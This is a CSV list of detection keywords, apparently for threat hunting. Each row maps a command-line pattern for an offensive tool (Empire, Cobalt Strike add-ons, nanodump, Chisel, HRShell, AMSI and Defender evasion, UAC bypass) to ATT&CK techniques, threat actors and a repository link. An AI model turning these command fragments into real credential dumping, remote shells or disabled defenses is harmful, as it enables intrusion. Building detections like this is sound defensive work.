samba-vuln-cve-2012-1182.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -SauronEye -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* -save-old -dc-ip *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -sc GetSyscallStub *,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* -sc SysWhispers3*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* -sc trustdump*,greyware_tool_keyword,adfind,Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,SolarWinds Compromise,FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass,Reconnaissance,https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* scan * --dc-ip *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* scan --github-org*,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -* scan --github-user*,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -* -Scan -ScanType 3 -File * -DisableRemediation -Trace -Level 0x10*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,0,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -* --scan-local-shares * -e *,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,0,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -* ScareCrow.go*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -* ScareCrow.go*,offensive_tool_keyword,cobaltstrike,Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GeorgePatsias/ScareCrow-CobaltStrike,1,0,N/A,10,10,437,68,2022-07-15T09:39:18Z,2021-06-24T10:04:01Z -* -ScheduledTask -OnIdle *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* scmuacbypass.cpp*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,0,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -* scmuacbypass.exe*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,0,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -* --script dns-srv-enum *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --script http-ntlm-info *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --script smb-enum-shares *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --script smb-security-mode*smb-enum-shares *,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -* --script smb-vuln-*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,0,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -* --script=http-ntlm-info --script-args=http-ntlm-info.root=*,offensive_tool_keyword,ntlmscan,scan for NTLM directories,T1087 - T1083,TA0006,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/ntlmscan,1,0,N/A,N/A,4,303,52,2023-05-24T05:11:27Z,2019-10-23T06:02:56Z -* --script=ldap-search -p *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --script=realvnc-auth-bypass *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --script=robots -z list*robots.txt*http*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* --script-args dns-srv-enum.domain=*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -ScriptString * -GetMinimallyObfuscated*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,0,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -* -ScriptString * -PSAmsiScanner *,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,0,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -* -seatbelt -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* --seclogon-duplicate*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -* SeriousSam.Execute *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,0,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -* --server * --type pass-pols*,offensive_tool_keyword,ldapsearch-ad,Python3 script to quickly get various information from a domain controller through his LDAP service.,T1018 - T1087 - T1069,TA0007 - TA0002 - TA0008,N/A,N/A,Reconnaissance,https://github.com/yaap7/ldapsearch-ad,1,0,N/A,N/A,2,123,26,2023-05-10T13:30:16Z,2019-12-08T00:25:57Z -* server -p 80 --reverse --socks5*,offensive_tool_keyword,AD exploitation cheat sheet,Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.,T1071 - T1090 - T1102,N/A,N/A,N/A,POST Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* server.py -s tornado --cert /*pem --key /*.pem*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -* -ServerUri * -FindAmsiSignatures*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,0,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -* service -dump all-services.json*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -* --service fortynorth*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -ServiceName * -PipeName *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Get-System.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* servicetags.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --session=allrules --wordlist*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* --set-as-owned smart -bp * kerberos * --kdc-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* Set-MpPreference -DisableIOAVProtection *,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -* SetMzLogonPwd *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* set-objectowner * -target-sid * -owner-sid *,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,0,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z -* setoolkit*,offensive_tool_keyword,social-engineer-toolkit,The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec,T1566 - T1598,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/trustedsec/social-engineer-toolkit,1,0,N/A,N/A,10,9394,2569,2023-08-25T17:25:45Z,2012-12-31T22:01:33Z -* -sgn -syscalls *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -sgn -unhook -antidebug *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* shadow auto -u * -p * -account *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -* SharpC2*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,0,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -* -SharpChromium *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* -SharpDPAPI -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* SharpEfsPotato*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,0,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -* -SharPersist *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* SharpRDPHijack*,offensive_tool_keyword,SharpRDPHijack,SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions,T1021.001 - T1078.003 - T1059.001,TA0002 - TA0008 - TA0006,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/bohops/SharpRDPHijack,1,0,N/A,10,4,382,84,2021-07-25T17:36:01Z,2020-07-06T02:59:46Z -* -SharpShares *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* -SharpSniper *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation 